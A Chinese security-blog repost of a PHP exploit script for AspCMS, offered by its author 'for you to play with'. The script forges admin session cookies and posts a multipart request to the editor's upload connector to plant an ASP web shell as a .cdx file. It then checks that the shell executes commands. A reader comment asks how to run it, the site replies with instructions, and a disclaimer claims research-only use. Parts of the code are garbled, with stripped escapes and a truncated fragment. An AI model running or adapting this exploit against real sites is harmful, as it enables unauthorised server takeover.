aspcms EXP 批量型

admin
admin
admin
140816
文章
117
评论
2021年4月3日20:02:32评论95 views字数 2906阅读9分41秒阅读模式

唉,没办法了,放手里也没用,给你们玩玩吧 

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet){
 $sock = fsockopen($host, 80);
if (!$sock) die("$errstr ($errno)n");

 fputs($sock, $packet);
 while (!feof($sock)) $resp .= fread($sock, 1024);
 fclose($sock);
 //print $resp;
 return $resp;

}

function connector_response($host,$html){
preg_match('/SetEditorContents('Content','(.*?)')/',$html,$arr);
if (strpos($arr[1],".cdx")){
print "n[-] Get Shell: http://".$host."/".$arr[1]." n";
Checkshell($host,$arr[1]);
}
else{
echo "n[-] Exploit Failure n";
}
}
if ($argc execute(request("cun"))'."rn".'%'.'>'."n";
$payload .= "-----------------------------265001916915724--rn";
$packet  = "POST {$connector} HTTP/1.1rn";
$packet .= "Host: {$host}rn";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724rn";
$packet .= "Content-Length: ".strlen($payload)."rn";
$packet .= "Cookie: username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9rn";
$packet .= "Connection: closernrn";
$packet .= $payload;
//print $packet;
connector_response($host,http_send($host, $packet));

function Checkshell($url,$path){
//$Shell="http://$url$path?cun=response.write+413783480"; 
$payload .= "cun=response.write+413783480rn";
$packet  = "POST $path?cun=response.write+413783480 HTTP/1.1rn";
$packet .= "Host: {$url}rn";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724rn";
$packet .= "Content-Length: ".strlen($payload)."rn";
$packet .= "Cookie: username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9rn";
$packet .= "Connection: closernrn";
$packet .= $payload;
 $sock = fsockopen($url, 80);
if (!$sock) die("$errstr ($errno)n");
 fputs($sock, $packet);
 while (!feof($sock)) $resp .= fread($sock, 1024);
 fclose($sock);
 //print $resp;
if(strpos($resp,"413783480")||strpos($resp,"execute")){
echo "[*] Shell Can Usen" ;
}else{
echo "[*] Shell Can't Usen";
}
}
?>

转自:http://www.90sec.org/thread-1631-1-1.html

留言评论(旧系统):

【匿名者】 @ 2012-03-25 20:57:03

aspcms EXP 批量型 这个东西怎么用的啊!!

本站回复:

晕,看来你是一只很菜的菜鸟,如果你装了php运行环境,执行:php.exe c:a.php(你保存的文件路径),会有相关提示。

文章来源于lcx.cc:aspcms EXP 批量型

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:02:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   aspcms EXP 批量型https://cn-sec.com/archives/325027.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息